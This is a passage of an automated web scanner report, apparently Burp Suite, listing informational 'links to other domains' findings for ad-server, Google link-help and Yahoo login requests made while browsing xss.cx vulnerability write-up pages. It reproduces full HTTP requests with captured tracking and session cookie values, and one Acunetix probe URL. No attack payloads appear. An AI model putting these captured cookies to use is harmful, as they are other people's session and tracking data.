GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303842148&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F26%2Fdork%2Floginsisnacom%2Fsql-injection-reflected-xss-cross-site-scripting-example-poc-report.html&dt=1303824177558&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303824177842&frm=0&adk=1607234649&ga_vid=1808494997.1303824179&ga_sid=1303824179&ga_hid=1628715820&ga_fc=0&u_tz=-300&u_his=6&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=965&bih=983&fu=0&ifi=1&dtd=1085&xpc=lKRtWE6YsY&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 26 Apr 2011 13:22:50 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12388

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/26/dork/loginsisnacom/sql-injection-reflected-xss-cross-site-scripting-example-poc-report.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.saintcorporation.com%26adT%3DWebsaint%2BPro%26adU%3Dwww.checkmarx.com%26adT%3DSQL%2BInjection%2BTutorial%26adU%3Dwww.Sentrigo.com%26adT%3DDatabase%2BSecurity%2BGuide%26gl%3DUS&amp;usg=AFQjCNHT3dfouqC0FAf7-guruivEZ04CpA" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

20.24. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303842649&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F26%2Fdork%2Fsql-injection-postgres-database-admin-error-weak-configuration-ghdh-reflected-xss-loginsisnacom.htm&dt=1303824803488&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303824803807&frm=0&adk=1819763764&ga_vid=61520569.1303824806&ga_sid=1303824806&ga_hid=858233649&ga_fc=0&u_tz=-300&u_his=10&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=965&bih=983&fu=0&ifi=1&dtd=2142&xpc=13iO88Ie8c&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 26 Apr 2011 13:33:15 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12669

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/26/dork/sql-injection-postgres-database-admin-error-weak-configuration-ghdh-reflected-xss-loginsisnacom.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.enterprisedb.com%26adT%3DDownload%2BPostgres%2BPlus%26adU%3Dwww.attunity.com/odbc-drivers%26adT%3DSybase%2BJDBC%2BDrivers%26adU%3Dwww.datadirect.com/ODBC%26adT%3DODBC%2Bto%2BSQL%2BServer%26gl%3DUS&amp;usg=AFQjCNHIJs1CpBoknHCcAJrFv4s650n0zg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

20.25. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303842217&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F26%2Fdork%2Fsql-injection-postgres-database-admin-error-weak-configuration-ghdh-reflected-xss-loginsisnacom.htm&dt=1303824238989&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303824239002&frm=0&adk=1819763764&ga_vid=1347859482.1303824239&ga_sid=1303824239&ga_hid=1668850280&ga_fc=0&u_tz=-300&u_his=10&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=981&bih=999&fu=0&ifi=1&dtd=18&xpc=GYTxhA8OUl&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 26 Apr 2011 13:23:50 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12755

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/26/dork/sql-injection-postgres-database-admin-error-weak-configuration-ghdh-reflected-xss-loginsisnacom.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.enterprisedb.com%26adT%3DDownload%2BPostgres%2BPlus%26adU%3Dwww.attunity.com/jdbc-drivers%26adT%3DDownload%2BJDBC%2BDB2%2BDrivers%26adU%3Dwww.datadirect.com/ODBC%26adT%3DODBC%2Bto%2BSQL%2BServer%26gl%3DUS&amp;usg=AFQjCNHNiCawfuBfECFVMPxV01FoxST2Fg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

20.26. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303800256&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F25%2Fdork%2Freflected-xss-cross-site-scripting-cwe79-capec86-ghdb-wwwgenbookcom.htm&dt=1303782297447&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303782297498&frm=0&adk=1819763764&ga_vid=190606745.1303782298&ga_sid=1303782298&ga_hid=647492866&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=907&bih=928&fu=0&ifi=1&dtd=151&xpc=ZxjtlC7jU7&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 26 Apr 2011 01:44:48 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4307

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/25/dork/reflected-xss-cross-site-scripting-cwe79-capec86-ghdb-wwwgenbookcom.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DSeaEagle.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNEJXD3MAvBoIvspz0i5PfyFVeiPpA" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

20.27. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303835509&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F26%2Fdork%2Faccountsnapcom%2Freflected-xss-cross-site-scripting-capec86-cwe79-dork-ghdb-report-example-poc.html&dt=1303817665946&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303817665999&frm=0&adk=1607234649&ga_vid=1111573264.1303817666&ga_sid=1303817666&ga_hid=1356844413&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=907&bih=928&fu=0&ifi=1&dtd=238&xpc=ql02NCTGR1&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 26 Apr 2011 11:34:18 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12842

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/26/dork/accountsnapcom/reflected-xss-cross-site-scripting-capec86-cwe79-dork-ghdb-report-example-poc.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.Sentrigo.com%26adT%3DDatabase%2BSecurity%2BGuide%26adU%3Dwww.IBM.com/SPSS_data_mining%26adT%3DSPSS%2BData%2BMining%2BPaper%26adU%3Dvulnerability.scan.qualys.com%26adT%3DOnline%2BVulnerability%2BScan%26gl%3DUS&amp;usg=AFQjCNGRwIG6EbY0lr1eDa6-8mZiaMD60Q" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

20.28. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303835928&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F26%2Fdork%2Freflected-xss-account.snap.com_443.htm&dt=1303824230280&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303824230285&frm=0&adk=1819763764&ga_vid=1237966377.1303824230&ga_sid=1303824230&ga_hid=422216691&ga_fc=0&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=981&bih=999&fu=0&ifi=1&dtd=9&xpc=YkFd6W5Msn&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 26 Apr 2011 13:23:41 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12235

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/26/dork/reflected-xss-account.snap.com_443.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.enterprisedb.com%26adT%3DDownload%2BPostgres%2BPlus%26adU%3Dwww.manageengine.com%26adT%3Dsybase%2Bmonitoring%26adU%3Dwww.attunity.com/jdbc-drivers%26adT%3DDownload%2BJDBC%2BDB2%2BDrivers%26gl%3DUS&amp;usg=AFQjCNH0dQhXTmwThOKPUN0U0gd5OKJvXA" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

20.29. http://ib.adnxs.com/ab  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ab?enc=pHA9CtcjE0CkcD0K1yMTQBLaci7FlQBApHA9CtcjE0CkcD0K1yMTQFUcOaKahDtdSsYda6b2ziXJ1LZNAAAAAEQwAAC1AAAAlgIAAAIAAADEpAIA0WMAAAEAAABVU0QAVVNEAHgAWAJhDE0AAg0BAgUCAAQAAAAAcx9FGwAAAAA.&tt_code=vert-314&udj=uf%28%27a%27%2C+9797%2C+1303827657%29%3Buf%28%27c%27%2C+52368%2C+1303827657%29%3Buf%28%27r%27%2C+173252%2C+1303827657%29%3Bppv%288991%2C+%276718109068834708565%27%2C+1303827657%2C+1303870857%2C+52368%2C+25553%29%3B&cnd=!uA56ZAiQmQMQxMkKGAAg0ccBKE0xMzMzEdcjE0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABY4RhgAGiWBQ..&referrer=http://www.spamlaws.com/spam-blocker.html&pp=TbbUyQAERXEK7FrIESl1USKqAlzx_1NgCAINaw&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBOnjTydS2TfGKEci1sQfR6qWJAdfq-NMBp5-U7Bjrwu3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi01MjUzODA5NDMwOTQwNDEwoAHD8v3sA7IBEHd3dy5zcGFtbGF3cy5jb226AQoxMjB4NjAwX2FzyAEJ2gEpaHR0cDovL3d3dy5zcGFtbGF3cy5jb20vc3BhbS1ibG9ja2VyLmh0bWyYAsobwAIEyAKF0s8KqAMB6AO6AugDigP1AwAAAMSABrqkhf7K9qWnTw%26num%3D1%26sig%3DAGiWqtyey6ImO1eOpu-MUOoG2tgmoZ9VPg%26client%3Dca-pub-5253809430940410%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5253809430940410&output=html&h=600&slotname=1644788465&w=120&lmt=1303845665&flash=10.2.154&url=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&dt=1303827665898&bpp=8&shv=r20110420&jsv=r20110415&prev_slotnames=8319948044%2C1020003104%2C9565114904%2C0023118579&correlator=1303827663964&frm=0&adk=222637912&ga_vid=902403751.1303827664&ga_sid=1303827664&ga_hid=1845423620&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=965&bih=956&fu=0&ifi=5&dtd=13&xpc=gvNjmv27ZD&p=http%3A//www.spamlaws.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIm4sBEAoYASABKAEwhY7L7QQQhY7L7QQYAA..; uuid2=2724386019227846218; anj=Kfu=8fG2<rgj[2<?0P(*AuB-u**g1:XIBUIEhzW()U9M1V)`B-9_(ygo7z0v4(^Nf$5@f1epA2Sw6La@%rmg/R-$1/uc>#?+!_/VvS?PF*yU-C4_rx!NEq)w+(RJbbKYr/.fmNX[=5u*'fkg>GB`St%p.uU(f#6kDukULq8/6Chj_YZn-BImfAMpaUTmN7*joV9bN)jmf5I]snH/]xnzH[iw%qgjwh>p+^cZz<R-eMV?4^a>]$!X9^RDTuLuZpK9=dIc/-`$T$goi.=oVzyWz'.(.XYco!RC'>1Qx(W`nwzUj?YH[J$3nv-KK#-iL$QJfrZbdN+(BosBCiJ'm<TIMEqIboyNV)q=Qp[*@Cf#8I-v%(BIP1j2)__HclCm<*N6uMz?9EChIE6Heba3v9eO'3D=f6?$k1DsLHwO4.ddbEp]y:s8ZIDamDmL[vt]Y?BqbrQnoc@iD:G@#d1R07d]E9#M:?dTed^`/$a<!%MSD0+[NQkt?PxChdO7dL8Xcmrl6eV=s'xP'kk61c7qYk; sess=1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 27-Apr-2011 14:21:03 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 14:21:03 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 14:21:03 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG4S]gj[2<?0P(*AuB-u**g1:XIF9]EhzW()U9M1V)`B-9_(ygo7z0v4(^Nf$5@f1epA2Sw6La@%rmg/R-$1/uc>#?+!_/VvS?PF*yU-C4_rx!NEq)w+(RJbbKYr/.fmNX[=5u*'fkg>GB`St%p.uU(f#6kDukULq8/6Chj_YZn-BImfAMpaUTmN7*joV9bN)jmf5I]snH/]xnzH[iw%qgjwh>p+^cZz<R-eMV?4^a>]$!X9^RDTuLuZpK9=dIc/-`$T$goi.=oVzyWz'.(.XYco!RC'>1Qx(W`nwzUj?YH[J$3nv-KK#-iL$QJfrZbdN+(Bo3KgX#`c5]qvg^lIg`K'/jYd`<2[cP$Mn.k).`o#?[DvFCmKS]_Rn]AnwyPLgc8R]HmkeLCt7wt+CdMJIY(Q8dnxZw!E9DDGh)[$QnR%ndJcRbu@?$Pk*eA85bgvgm.WQEeO/56q?$4$_+(]sS//QhH(L+o:.t`@]S2kvs7O@m7UZqq?WyPmfoNWxM!.CjYr2V.i; path=/; expires=Mon, 25-Jul-2011 14:21:03 GMT; domain=.adnxs.com; HttpOnly
Date: Tue, 26 Apr 2011 14:21:03 GMT
Content-Length: 1560

document.write('<scr' + 'ipt language=\"Javascript\"><!--\n amgdgt_p=\"5112\";\n amgdgt_pl=\"bb9cfe77\"; \n amgdgt_t = \"i\";\n amgdgt_clkurl = \"http://ib.adnxs.com/click/PQrXo3A9DEA9CtejcD0MQBLa
...[SNIP]...
</noscript>');document.write('<iframe src="http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe>
...[SNIP]...

20.30. http://linkhelp.clients.google.com/tbproxy/lh/fixurl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://linkhelp.clients.google.com
Path:   /tbproxy/lh/fixurl

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /tbproxy/lh/fixurl?hl=en-US&sd=com&url=http%3A%2F%2Fseg.sharethis.com%2FAcuNginxTest662981.txt%2Facunetix.php&sourceid=chrome&error=http404 HTTP/1.1
Host: linkhelp.clients.google.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=Arvh7RneopiyMp_J1gBnwK6dUPjUg-iLEhhvnp_D5jiL5VKX_NLiPiRWmQSBdMwimsMifg4dxWitIEE9yICSOAtkSTBLprF7rndg9WUki2R-eKxI3lr2JBjCshmP3gTT

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 00:19:33 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Server: linkdoctor/fixurlserver
X-XSS-Protection: 1; mode=block
Content-Length: 6202

<!DOCTYPE html><html lang="en" ><meta charset="utf-8" /><title>Oops! This link appears to be broken - seg.sharethis.com/AcuNginxTest662981.txt/acunetix.php</title><script type="text/javascript">(funct
...[SNIP]...
<li>Go to <a href="http://sharethis.com/" onmousedown="return rwctrd(this,'dm','0','http://www.google.com/url?sa=D&q=http://sharethis.com/&usg=AFQjCNEXPKE-n7BWaDoS4rCOES9JwAALJQ');"><b>
...[SNIP]...

20.31. https://login.yahoo.com/config/login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.yahoo.com
Path:   /config/login

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /config/login?.done=http://downloads.yahoo.com%2findex.php&.src=ydl&.intl=us HTTP/1.1
Host: login.yahoo.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
